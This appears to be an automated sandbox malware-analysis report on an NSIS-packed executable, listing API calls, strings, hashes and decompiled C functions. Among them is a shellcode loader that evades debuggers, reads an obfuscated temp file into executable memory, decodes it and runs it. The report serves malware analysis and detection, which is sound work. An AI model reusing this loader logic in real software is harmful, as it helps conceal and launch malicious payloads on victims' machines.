                                        • GetCommandLineA.KERNEL32 ref: 004031E6
                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 004031F5
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000020), ref: 00403220
                                        • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                        • ExitProcess.KERNEL32 ref: 00403336
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                        • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                        • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                        • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                        • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                        • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                        • CopyFileA.KERNEL32 ref: 004033C1
                                        • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                        • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                        • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                        • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                        • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                        • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                        • ExitProcess.KERNEL32 ref: 004034FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                        • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\Y4U48592345670954.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                        • API String ID: 3079827372-2304860889
                                        • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                        • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                        • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                        • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 98%
                                        			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055AC(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x7a3008 =  *0x7a3008 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059BF(0x7a0588, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E00405513(_t74);
					} else {
						lstrcatA(0x7a0588, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x7a0588,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                        0x0040530c
                                        0x00405310
                                        0x00405319
                                        0x0040531c
                                        0x0040531f
                                        0x00405327
                                        0x00405329
                                        0x0040532a
                                        0x00000000
                                        0x0040532a
                                        0x00405339
                                        0x00405339
                                        0x0040533c
                                        0x0040533f
                                        0x00405353
                                        0x0040535a
                                        0x0040535f
                                        0x00405361
                                        0x00405371
                                        0x00405363
                                        0x00405369
                                        0x00405369
                                        0x0040537c
                                        0x00405391
                                        0x00405393
                                        0x00405399
                                        0x0040539c
                                        0x0040539f
                                        0x00405461
                                        0x00405461
                                        0x00405465
                                        0x00405467
                                        0x00405467
                                        0x00405467
                                        0x00405467
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004053a5
                                        0x004053a5
                                        0x004053ae
                                        0x004053b4
                                        0x004053b9
                                        0x004053bc
                                        0x004053be
                                        0x004053c2
                                        0x004053c4
                                        0x004053c4
                                        0x004053c2
                                        0x004053c7
                                        0x004053ca
                                        0x004053dd
                                        0x004053df
                                        0x004053e4
                                        0x004053ea
                                        0x004053ec
                                        0x00405407
                                        0x0040540e
                                        0x00405414
                                        0x00405416
                                        0x0040543b
                                        0x00405418
                                        0x00405418
                                        0x0040541c
                                        0x00405430
                                        0x0040541e
                                        0x00405421
                                        0x00405429
                                        0x00405429
                                        0x0040541c
                                        0x004053ee
                                        0x004053f4
                                        0x004053f6
                                        0x004053fc
                                        0x004053fc
                                        0x004053f6
                                        0x00000000
                                        0x004053ec
                                        0x004053cc
                                        0x004053cf
                                        0x004053d1
                                        0x00000000
                                        0x00000000
                                        0x004053d3
                                        0x004053d5
                                        0x00000000
                                        0x00000000
                                        0x004053d7
                                        0x004053db
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405440
                                        0x0040544a
                                        0x00405450
                                        0x00405450
                                        0x0040545b
                                        0x00000000
                                        0x00405341
                                        0x00405341
                                        0x00405343
                                        0x0040546b
                                        0x0040546e
                                        0x00405471
                                        0x004054c9
                                        0x004054c9
                                        0x004054c9
                                        0x00405473
                                        0x00405476
                                        0x00405481
                                        0x00405486
                                        0x00405488
                                        0x00000000
                                        0x00000000
                                        0x0040548b
                                        0x00405496
                                        0x0040549d
                                        0x004054a3
                                        0x004054a5
                                        0x00000000
                                        0x004054c1
                                        0x004054a7
                                        0x004054ab
                                        0x00000000
                                        0x00000000
                                        0x004054b0
                                        0x00000000
                                        0x004054b7
                                        0x00405478
                                        0x00405478
                                        0x00000000
                                        0x00405478
                                        0x00405349
                                        0x0040534d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040534d

                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 0040531F
                                        • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 00405369
                                        • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 0040537C
                                        • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 00405382
                                        • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 00405393
                                        • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                        • FindClose.KERNEL32(?), ref: 0040545B
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                        • "C:\Users\user\Desktop\Y4U48592345670954.exe" , xrefs: 0040530B
                                        • \*.*, xrefs: 00405363
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\Y4U48592345670954.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-405746175
                                        • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                        • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                        • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                        • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6F731000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 89filememorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E6F731000() {
				char _v532;
				void* _t5;
				void* _t8;
				void* _t27;
				void* _t29;
				signed char _t30;
				long _t31;
				WCHAR* _t32;
				void* _t33;
				void* _t34;
				DWORD* _t35;

				 *_t35 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t32 =  &_v532;
				_t5 = GetTempPathW(0x103, _t32);
				if(_t5 != 0) {
					lstrcatW(_t32, L"\\sn7trv7b4c9aukp2");
					_t5 = CreateFileW(_t32, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					if(_t5 != 0xffffffff) {
						_t33 = _t5;
						_t5 = GetFileSize(_t5, 0);
						if(_t5 != 0xffffffff) {
							_t31 = _t5;
							_t5 = VirtualAlloc(0, _t5, 0x3000, 0x40); // executed
							 *0x6f733000 = _t5;
							if(_t5 != 0) {
								_t5 = ReadFile(_t33, _t5, _t31, _t35, 0); // executed
								if(_t5 != 0) {
									_t34 =  *0x6f733000;
									if( *_t35 == 0) {
										L10:
										_t8 =  *_t34(); // executed
										return _t8;
									}
									_t27 = 0;
									_t29 = 0xee;
									do {
										_t30 = _t29 + 2;
										_t29 = _t30 - 1;
										 *((char*)(_t34 + _t27)) = (_t30 ^ 0x000000b6) - (_t30 ^ 0x000000b6);
										_t27 = _t27 + 1;
										_t34 =  *0x6f733000;
									} while (_t27 <  *_t35);
									goto L10;
								}
							}
						}
					}
				}
				return _t5;
			}














                                        0x6f731009
                                        0x6f731018
                                        0x6f73101a
                                        0x6f73101a
                                        0x6f731020
                                        0x6f73102a
                                        0x6f731032
                                        0x6f73103e
                                        0x6f731057
                                        0x6f731060
                                        0x6f731066
                                        0x6f73106b
                                        0x6f731074
                                        0x6f731076
                                        0x6f731082
                                        0x6f73108a
                                        0x6f73108f
                                        0x6f731099
                                        0x6f7310a1
                                        0x6f7310a7
                                        0x6f7310ad
                                        0x6f7310f0
                                        0x6f7310f0
                                        0x00000000
                                        0x6f7310f0
                                        0x6f7310af
                                        0x6f7310b3
                                        0x6f7310b5
                                        0x6f7310c9
                                        0x6f7310db
                                        0x6f7310e1
                                        0x6f7310e4
                                        0x6f7310e5
                                        0x6f7310eb
                                        0x00000000
                                        0x6f7310b5
                                        0x6f7310a1
                                        0x6f73108f
                                        0x6f731074
                                        0x6f731060
                                        0x6f7310fb

                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6F731010
                                        • DebugBreak.KERNEL32 ref: 6F73101A
                                        • GetTempPathW.KERNEL32(00000103,?), ref: 6F73102A
                                        • lstrcatW.KERNEL32(?,\sn7trv7b4c9aukp2), ref: 6F73103E
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F731057
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 6F73106B
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6F731082
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 6F731099
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.662341168.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true
                                        • Associated: 00000000.00000002.662335770.000000006F730000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.662346953.000000006F732000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.662351865.000000006F734000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                        • String ID: \sn7trv7b4c9aukp2
                                        • API String ID: 4020703165-511455160
                                        • Opcode ID: dd22a3c7c4abb88a9930841a12a0ace78b15c2273cf10ebb27a82be554f8d022
                                        • Instruction ID: 8c073a3c2b7ada9daab883144d521718932dd3b3b10743ceb25d853904411ac2
                                        • Opcode Fuzzy Hash: dd22a3c7c4abb88a9930841a12a0ace78b15c2273cf10ebb27a82be554f8d022
                                        • Instruction Fuzzy Hash: F121C873E456607FFB300A30CD4EBA63B59DB46722F11012EF595DA1C1DAA4A416CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x7a3030 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D62(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000);
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
				return 0;
			}










                                        0x00401fdc
                                        0x00401fe4
                                        0x00401fe7
                                        0x00401ff3
                                        0x00402093
                                        0x00000000
                                        0x00401ff9
                                        0x00402001
                                        0x0040200b
                                        0x0040200e
                                        0x0040201d
                                        0x0040201e
                                        0x00402024
                                        0x00402028
                                        0x0040208f
                                        0x00402095
                                        0x00402095
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402010
                                        0x00402011
                                        0x00402017
                                        0x0040201b
                                        0x0040202a
                                        0x00402034
                                        0x00402038
                                        0x0040207c
                                        0x0040203a
                                        0x0040203d
                                        0x00402040
                                        0x00402070
                                        0x00402042
                                        0x00402045
                                        0x0040204e
                                        0x00402050
                                        0x00402050
                                        0x0040204e
                                        0x00402040
                                        0x00402084
                                        0x00402087
                                        0x00402087
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040201b
                                        0x0040200e
                                        0x0040209b
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                        • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                        • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                        • SetErrorMode.KERNEL32 ref: 0040209B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 1609199483-0
                                        • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                        • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                        • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                        • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405C94(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x7a15d0;
			}





                                        0x00405ca2
                                        0x00405cae
                                        0x00405cb6
                                        0x00405cb8
                                        0x00405cbd
                                        0x00000000
                                        0x00405cca
                                        0x00405cc0
                                        0x00000000

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ), ref: 00405CA2
                                        • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                        • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                        • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ErrorFindMode$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2885216544-3081826266
                                        • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                        • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                        • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                        • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 89%
                                        			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x7a2f88;
				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x79f580;
					"1033" = 0x7830;
					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
					__eflags =  *0x79f580;
					if(__eflags == 0) {
						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
					}
					lstrcatA("1033", _t78);
				} else {
					E0040591D("1033",  *_t20() & 0x0000ffff);
				}
				E004037F2(_t75, _t88);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
				if(E004055AC(_t88, _t84) != 0) {
					L16:
					if(E004055AC(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059E1(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2768 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037F2(_t75, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t31 = E00404E34(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x7a274c;
								if( *0x7a274c == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f560, 5);
